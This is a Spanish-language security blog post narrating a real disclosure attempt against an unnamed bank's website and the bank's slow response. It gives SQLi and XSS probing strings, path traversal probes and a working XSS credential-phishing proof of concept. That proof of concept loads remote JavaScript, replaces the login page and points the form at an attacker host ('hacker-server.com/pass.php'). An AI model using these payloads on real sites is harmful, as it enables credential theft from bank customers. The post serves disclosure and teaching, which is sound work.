16 abr 2018

Hackeando un Banco (Caso Real) [XSS + Sensitive Data Exposure + explicación SQLi]


 Hace tiempo que no escribo, pero ahora amerita la ocasión... Estoy acostumbrado a escribir reportes de seguridad de las vulnerabilidades que encuentro en los sitios webs que visito, para mandárselo al encargado del sitio o webmaster. Normalmente cuando se encuentra un bug, es muy probable que se encuentren muchos más ya que en la mayoría de casos los errores los encuentro poniendo un "<marquee>" o una comilla simple  en cualquier parámetro GET o POST que encuentre. Ejemplo:
http://www.sitio.com/index.php?id=1<marquee>
http://www.sitio.com/index.php?id=1'

 Como ya muchos sabrán el primero es para encontrar XSS y el segundo para encontrar SQLi, pero también sirven para encontrar LFI, Remote File InclusionDirectory file include, inyección de código, inyección de comandos... Existen muchos tipos de vulnerabilidades que se pueden encontrar con una simple comilla o un carácter no alfanumérico.

 En el primer caso ( ?id=1<marquee> ) si la página se mueve es vulnerable a XSS, si en algún campo de la web aparece <marquee> todavía es vulnerable a XSS pero hay que buscar algún bypass y eso es aburrido y tedioso.

 En el segundo caso ( ?id=1' ), solo voy a explicar el caso del SQLi ya que no es la finalidad de este post explicar en detalle todos los tipos de ataques, esta es solo la introducción de a lo que quiero llegar... Pues bueno, si al poner la comilla simple lanza un Error 404 (Not Found) probablemente el sitio no sea vulnerable a SQLi, pero si te encuentras con un error del tipo:
You have an error in your SQL syntax; check the manual
that corresponds to your MySQL server version for the
right syntax to use near '\'' at line 1
 Significa que es vulnerable a SQLi, si no aparece ese mensaje, pero el servidor responde un Error 500 (Internal Server Error) o no responde nada (la página queda en blanco o no muestra resultados) hay que remplazar la comilla por un and 1=1 y por un and 1=2 Ejemplo:
http://www.sitio.com/index.php?id=1 and 1=1
http://www.sitio.com/index.php?id=1 and 1=2

 Si en el primer caso el contenido aparece bien, igual que sin el and 1=1, y en el segundo caso no aparece nada, significa que es vulnerable a Blind SQLi.

 Como ven, con simples 2 o 3 pasos que verifiques cada vez que visites una web y veas algún ?parameter=value en la bara de direcciones, puedes encontrar muchos sitios webs vulnerables a diferentes tipos de ataques como los descritos arriba. (*Nota: muchos parámetros están embellecidos como rutas, por ende también puedes encontrar parámetros GET que se pasan con el formato /parameter/value)

 Es en esa rutina de poner comillas me encuentro con que en el sitio web de un importante Banco, donde pongo una comilla en un parámetro script.aspx?Id=12'  y encuentro un error que filtra mucha información del servidor donde se aloja:


 Esta es una vulnerabilidad llamada Sensitive Data Exposure, el problema radica en que está activado el modo debug o modo desarrollador, por lo tanto se puede ver un útil reporte del error para los desarrolladores, pero que muestra demasiada información a terceros.

Datos obtenidos:
  •  Sistema operativo del servidor.
  •  Versión .NET Microsoft Framework.
  •  Versión ASP.NET.
  •  Ruta absoluta del proyecto en el servidor.
  •  Extractos de código múltiple errores y logs.

 A primera vista no pareciera ser una vulnerabilidad seria, pero un hacker puede usar esta información para buscar la aplicación y su versión en repositorios de vulnerabilidades y exploits, para verificar si existe algún exploit listo para descargar, ejecutar y tomar el sistema. Por otro lado, solo le damos más información a un atacante para que busque vulnerabilidades más serias en el resto de las rutas y logs filtrados.

 Por suerte para el Banco al intentar inyectar código no se puede ya que las parámetros son saneados (a los valores se les quita algunos caracteres famosos por ser usados para inyectar código como por ejemplo ' < >), pero aun así se pueden inducir diferentes errores:

https://www.banco.xxx/ruta/script.aspx?Id=58l
Error: Could not find a part of the path "C:\ruta\home58l\link.inc".

https://www.banco.xxx/ruta/script.aspx?Id=58:1
Error: Invalid path for MapPath '/ruta/home58:1//link.inc'. A virtual path is expected.

https://www.banco.xxx/ruta/script.aspx?Id=58"l
Error: Illegal characters in path.

 También se puede inyectar la ruta de otra carpeta, pero por suerte para el Banco, a la consulta se le concatena el nombre de un archivo que debe existir dentro de la carpeta, así que solo se puede ver contenido de carpetas con el archivo concatenado en la consulta.

https://www.banco.xxx/ruta/script.aspx?Id=58/../carpeta59/
200 OK!

 Por mi falta de conocimiento en ASP y NET es que me rindo de intentar buscar más formas de vulnerar el sistema, y como dije antes, si encuentras una vulnerabilidad, es posible que encuentres muchas más... Es así como encuentro un XSS:

https://www.banco.xxx/ruta/script.aspx?Id=58<marquee>
 Se mueve todo así que es vulnerable a XSS, ahora pruebo con una imagen:


 Dos de los ataques más comunes que se pueden hacer para sacar provecho de un XSS, es el robo de cookies de sesión y la suplantación de formularios de acceso (usuario/contraseña). El robo de cookies no será efectivo ya que el Banco tiene un sistema de sesiones únicas por ende la cookie sólo sirve para recibir un mensaje de error, por tanto decido una suplantación de formularios de acceso.

 La forma más fácil de hacer esto es inyectando un código javascript que borre todo el contenido en la página web legítima y ponga los formularios para mandar las credenciales a un servidor que controle el atacante.

https://www.banco.xxx/ruta/script.aspx?Id=97"><script type="text/javascript" src="http://yourjavascript.com/000000/a.js"></script>
o
https://www.banco.xxx/ruta/script.aspx?Id=97%22%3E%3Cscript%20type=%22text/javascript%22%20src=%22http://yourjavascript.com/000000/a.js%22%3E%3C/script%3E

 El javascript es muy sencillo y su sintaxis es esta:
var html = `
<html>
<body>
<h1>Página web del Banco</h1>
<p><marquee>El banco más seguro del mundo.</marquee></p>
</body>
</html>
`;

document.body.innerHTML = html;

 Dentro de var html = `<!-code here->`; se copia y pega el código de la página web de acceso del sitio web légitimo, se debe cambiar las rutas relativas agregando la url de la web original:
De: <link rel="stylesheet" type="text/css" href="/login/assets/style.css">
A:  <link rel="stylesheet" type="text/css" href="https://www.banco.xxx/login/assets/style.css">

Por último y más importante, se debe reemplazar el action del formulario a un script en PHP que guarde las credenciales en un servidor controlado por el atacante:
De: <form action="/login.php" method="post">
A:  <form action="https://hacker-server.com/pass.php" method="post">

 Se puede ir viendo como queda el resultado apretando F12 en cualquier web y pegando el código en la consola javascript:


 Como es una prueba de concepto para mandar un reporte con la vulnerabilidad, el script en PHP que intercepta las credenciales simplemente será un script que muestre los parámetros POST en pantalla:
<?php
echo "<pre>";
print_r($_POST);
echo "</pre>";
?>

 Ya todo está listo y el PoC funciona perfecto:


 Y cuando ingresan sus credenciales se envían al servidor del atacante:


Envío del reporte y respuestas

 Una vez con el reporte listo y con el PoC funcionando intento buscar alguna forma de contactarme con el Banco para enviárselo... No encuentro nada, así que uso una herramienta llamada contact.sh que es un script que intenta varios métodos y convenciones para encontrar al encargado de un sitio web... Y nada nuevamente, así que me digno a escribirles a través de Twitter y me responden diciendo que escriba a un correo que me dieron.

 Escribo al correo proporcionado y no me responden en varios días, ni siquiera un "Recibido, muchas gracias", así que de nuevo pido a través de Twitter algún mail para poder enviar el reporte.... YYY, visto!


 A la semana me llega un mail:



 Como pueden ver me mandaron el mail de un especialista en marketing y clientes, y no el de un especialista en seguridad, probablemente esas dos áreas estén muy separadas dentro del Banco y ni si quiera se comuniquen, así que el reporte de seguridad quedó archivado como un reclamo de cliente...

 Y un día después del mail me llaman:

Yo: Alo?
Telefonista: Hola, llamamos del Banco X para informarte que tu reclamo fue derivado al área que corresponde. 
Yo: No es un reclamo, es un reporte de seguridad. A qué área lo derivaron?
Telefonista: No lo sé, nosotros somos el área de clientes, pero te van a contactar!
Yo: Ok! Gracias por la información, Adiós!....... Espera, tienen Bug Bounty?
Telefonista: [Cuelga]

 Hasta el día de hoy, nadie me ha contactado y las vulnerabilidades se mantienen exactamente como el primer día que las reporté. Ya pasó más de un mes y al parecer no hay intención de arreglarlo, así que me decidí a escribir este post.

Conclusiones

 Los XSS son vulnerabilidades que tienen un impacto bajo hoy en día, el ataque que mostré arriba, solo puede ser replicado en Firefox ya que todos los demás browsers bloquean los posibles XSS, eso no exime de responsabilidades a los encargados de seguridad. Como pueden ver también el Banco no tiene protocolos para reportar bugs y mucho menos un programa de Bug Bounty. La situación es peor ya que investigando un poco más, el Banco terceriza el desarrollo de aplicaciones (contrata una empresa externa para que las haga), eso en muchos casos es útil, pero en un Banco que maneja datos sensibles de clientes no debería tener permitido traspasar datos a empresas externas, menos delegar la seguridad a ellos. Hay que notar también que las tecnologías usadas para el desarrollo de aplicaciones bancarias ya están obsoletas y los problemas presentados anteriormente son en gran medida por usar Frameworks anticuados que no validan como corresponden los inputs y malas configuraciones.

Las pruebas de concepto que se presentan arriba fueron realizadas con la finalidad de demostrar el impacto que pueden tener y en ningún momento fueron usadas con otra finalidad.

[+] Salu2
[!] Zion3R


Author & Editor

Ingeniero, me gusta la cyberseguridad, la programación y el blockchain.

Labels

0-day (12) 1337day (1) 8.8 (2) Adobe Acrobat (1) Android (2) Anonimato (1) Anonymous (9) BackDoor (2) BackTrack (15) badUSB (1) Base64 (1) Black Hat (7) BlackHat (1) Blackploit (30) Brute Force (3) Bug (106) Bypass Password (1) Bypass Redirect (1) C99 Shell (1) Carding (1) CheatSheet (15) Chilean Way (2) Conference (10) Cryptsetup (1) CSRF (1) DDoS (11) DEF CON (3) DEFCON (7) Dev (1) Diapositivas (1) Diseño Web (1) Distro Linux (27) Documental (2) DoS (2) Drupal (1) DuckDuckGo (1) E-zine (18) Ekoparty (1) Escaneo (4) España (1) Exploit (64) Ezine (1) Facebook (1) Fast-Info (44) FBI (1) Ficheros Binarios (1) Firefox (4) Flash (2) Forense (9) Fuerza Bruta (11) Fuga de Datos (1) GhostShell (1) GNU/Linux (4) Google (2) Guía (1) Hack T00LZ (135) Hack Tips (63) Hacked (6) Hacking (19) Hacking Hardware (5) HashCat (1) Herramientas (125) HighSecCON (1) Humor Geek (13) Infografía (1) Ingeniería Social (5) Inj3ct0r (1) Internet Explorer (3) Java (7) JavaScript (2) Kali (3) KitPloit (6) Leaks (22) Linux OS (79) LulzSec (1) Mac OS (10) Magazine (1) Malaware (3) Malaware Tools (12) Malware (1) Man in the Middle (15) Manuales (3) MD5 CRACK (4) Metasploit (57) MSSQL (1) MySQL (6) MySQL CRACK (1) Nmap (6) Nmap NSE (2) Noticias (200) NTLM CRACK (1) Ofuscar (5) OpenSolaris OS (1) OpenSSL (1) ORACLE (1) OWASP (3) Paper (10) PDF (7) PenTest (14) Perl (2) Phearking (13) Phishing (3) PHP (13) phpMyAdmin (1) PoC (1) Premios Bitacoras (1) Presentaciones (11) PRISM (1) Privacidad (2) Programación (12) Programas Linux (41) Programas Windows (41) Pwned (1) Python (5) Ransomware (1) Reconocimiento (5) Ruby (2) s (1) Scripts (7) Seguridad (150) Seguridad Web (139) Seguridad Wireless (19) Sensitive Data Exposure (2) SHA1 CRACK (1) Shellshock (1) Slides (1) Spoofing (1) Spyware (1) SQLi (19) SQLi Tools (7) SQLMap (2) SSH (1) Textos (74) Tips (57) Troyanos y Virus (11) Trucos (7) Trucos Win (7) Turiales (56) Tutoriales (18) Twitter (1) Ubuntu (2) Underc0de (1) UnderDOCS (1) Unlock (1) URL Redirection (1) UXSS (1) vBulletin (1) Video (48) Virtualización (2) Web T00LZ (16) Wifislax (1) Wikileaks (1) WikiRebels (1) Windows OS (65) Wireless Tools (13) XSS (16) Youtube (1)

 
biz.